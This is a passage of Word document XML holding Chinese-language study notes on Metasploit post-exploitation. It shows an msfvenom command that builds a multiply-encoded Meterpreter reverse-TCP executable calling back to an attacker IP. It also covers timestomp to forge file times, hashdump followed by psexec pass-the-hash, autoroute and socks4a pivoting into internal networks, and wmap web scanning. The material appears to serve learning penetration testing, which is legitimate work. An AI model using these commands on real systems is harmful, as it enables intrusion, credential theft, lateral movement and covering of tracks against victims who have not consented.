      <w:r w:rsidRPr="00542673">
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00542673">
        <w:t>支持的输出格式列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009618BE" w:rsidRDefault="009618BE" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>run get_local_subnets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 得到网络分配的情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009618BE" w:rsidRDefault="009618BE" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">run autoroute </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>s 192.168.1.10/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009618BE" w:rsidRDefault="009618BE" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>run autoroute -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="00D67DE0" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>timestomp c:\\www -c "09/09/1980 12:12:34"</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>修改文件创建时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34"</w:t>
      </w:r>
      <w:r>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:t>修改文件修改时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096BE8" w:rsidRPr="00096BE8" w:rsidRDefault="00096BE8" w:rsidP="00096B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msiexec</w:t>
      </w:r>
      <w:r w:rsidRPr="00096BE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>相关参数解释如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A7760" w:rsidRPr="00096BE8" w:rsidRDefault="00096BE8" w:rsidP="003A7760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/quiet</w:t>
      </w:r>
      <w:r w:rsidRPr="00096BE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:安装过程中禁止向用户发送消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>/qn</w:t>
      </w:r>
      <w:r w:rsidRPr="00096BE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:不使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>/i</w:t>
      </w:r>
      <w:r w:rsidRPr="00096BE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:安装程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67DE0" w:rsidRDefault="001643BE" w:rsidP="006F554C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多次编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001D38A1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D38A1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="001D38A1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>管道可以</w:t>
      </w:r>
      <w:r w:rsidR="001D38A1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实现，</w:t>
      </w:r>
      <w:r w:rsidR="001D38A1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从而进行多种编码的</w:t>
      </w:r>
      <w:r w:rsidR="001D38A1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001643BE" w:rsidRDefault="001643BE" w:rsidP="006F554C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ab/>
      </w:r>
      <w:r w:rsidR="008F089B" w:rsidRPr="008F089B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=192.168.1.182 | msfvenom -e x86/shikata_ga_nai -a x86 –pla</w:t>
      </w:r>
      <w:r w:rsidR="00286C5A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tform windows -f exe &gt; meter.ex</w:t>
      </w:r>
      <w:r w:rsidR="00DE64BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00DE64BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="00274389">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r w:rsidR="00DE64BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以读取stdin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001643BE" w:rsidRDefault="007257FE" w:rsidP="006F554C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还有就是产生代码文件自己编译：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007257FE" w:rsidRPr="007257FE" w:rsidRDefault="007257FE" w:rsidP="007257FE">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007257FE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>root@kali:~# msfvenom --help-formats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007257FE" w:rsidRPr="007257FE" w:rsidRDefault="007257FE" w:rsidP="007257FE">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007257FE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executable formats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007257FE" w:rsidRPr="007257FE" w:rsidRDefault="007257FE" w:rsidP="007257FE">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007257FE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007257FE" w:rsidRPr="007257FE" w:rsidRDefault="007257FE" w:rsidP="007257FE">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007257FE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Transform formats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007257FE" w:rsidRDefault="007257FE" w:rsidP="007257FE">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007257FE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A5774D" w:rsidRDefault="00B66E40" w:rsidP="007257FE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hashdump 获取hash值</w:t>
      </w:r>
      <w:r w:rsidR="00A45B45">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果能找到smb账户与密码的hash</w:t>
      </w:r>
      <w:r w:rsidR="00872910">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。使用</w:t>
      </w:r>
      <w:r w:rsidR="00A45B45">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00A45B45">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/windows/smb/</w:t>
      </w:r>
      <w:r w:rsidR="00A45B45">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:r w:rsidR="00420453">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，直接set</w:t>
      </w:r>
      <w:r w:rsidR="00420453">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> smbpass hash值</w:t>
      </w:r>
      <w:r w:rsidR="00420453">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A5774D" w:rsidRDefault="00A5774D" w:rsidP="007257FE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不推荐使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">： </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001643BE" w:rsidRPr="00382849" w:rsidRDefault="00AF3765" w:rsidP="006F554C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 xml:space="preserve">load wmap </w:t>
      </w:r>
      <w:r w:rsidR="00D16008">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加载专门用于对wmap</w:t>
      </w:r>
      <w:r w:rsidR="00D97DA6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>体系结构</w:t>
      </w:r>
      <w:r w:rsidR="00D16008">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审计的插件</w:t>
      </w:r>
      <w:r w:rsidR="00382849">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，检测常见的web漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16008" w:rsidRDefault="00D16008" w:rsidP="006F554C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ab/>
        <w:t>wmap_sites –h</w:t>
      </w:r>
      <w:r w:rsidR="004C2E59">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 用于增加</w:t>
      </w:r>
      <w:r w:rsidR="00AC10F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可选</w:t>
      </w:r>
      <w:r w:rsidR="004C2E59">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网址</w:t>
      </w:r>
      <w:r w:rsidR="004C2E59">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00AC10F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidR="00AC10F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自动进行DNS解析</w:t>
      </w:r>
      <w:r w:rsidR="00AC10F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00AC10F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00AC10F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-l可以看到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16008" w:rsidRDefault="00D16008" w:rsidP="006F554C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ab/>
      </w:r>
      <w:r w:rsidR="00ED539B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">wmap_targets </w:t>
      </w:r>
      <w:r w:rsidR="00320F31">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00ED539B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00320F31">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 指定目标</w:t>
      </w:r>
      <w:r w:rsidR="000A6A6C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="000A6A6C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>视频中这里</w:t>
      </w:r>
      <w:r w:rsidR="000A6A6C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已经使用wmap</w:t>
      </w:r>
      <w:r w:rsidR="000A6A6C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_sites中</w:t>
      </w:r>
      <w:r w:rsidR="000A6A6C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidR="000A6A6C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="0018560D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="000A6A6C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ip来指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF3765" w:rsidRDefault="009A2534" w:rsidP="006F554C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ab/>
        <w:t xml:space="preserve">wmap_run </w:t>
      </w:r>
      <w:r w:rsidR="007A1AD9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>–t 指定target以后</w:t>
      </w:r>
      <w:r w:rsidR="007A1AD9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007A1AD9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用这个来对目标进行扫描</w:t>
      </w:r>
      <w:r w:rsidR="007A1AD9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007A1AD9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示可以使用的模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1AD9" w:rsidRPr="009A2534" w:rsidRDefault="007A1AD9" w:rsidP="006F554C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ab/>
        <w:t>wmap_run –e path of module 加载指定模块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szCs w:val="21"/>
        </w:rPr>
        <w:t>进行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="00C26E54" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C26E54">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>wmap_vulns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l  使用模块以后的结果会显示在这里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26E54" w:rsidRPr="005D5318" w:rsidRDefault="00C26E54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有一次见到msf的脚本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6C7F52" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【内网】</w:t>
      </w:r>
      <w:r w:rsidR="005D5318" w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳板：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRPr="005D5318" w:rsidRDefault="00BB792B" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先使用run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> get_local_subnets得到子网划分的情况</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="005D5318" w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Meterpreter中run autoroute -s IP</w:t>
      </w:r>
      <w:r w:rsidR="00A6586E">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围 </w:t>
      </w:r>
      <w:r w:rsidR="005D5318" w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和run autoroute -p然后就会在被控机到指定ip的路由项。也可以自己用shell命令来添加一台路由项。</w:t>
      </w:r>
      <w:r w:rsidR="002A3638">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由规则市创建在msf中，所以之后可以直接使用模块，然后借助proxychains作为系统地阿里。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D414D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建立代理服务器，将所有请求利用被控机的Meterpreter会话来装发（自动使用Meterpreter内置的连接）auxiliary/server/socks4a set SRVHOST </w:t>
      </w:r>
      <w:r w:rsidR="00A6586E">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己的真实ip</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（也可以自己改SRVPORT） </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D414D" w:rsidRDefault="009D414D" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>如果想要通过自己的云服务器来连接攻击者内网与受害者内网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那么需要在云服务器上做端口转发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00125A07" w:rsidRDefault="00125A07" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00125A07" w:rsidRDefault="006C7F52" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
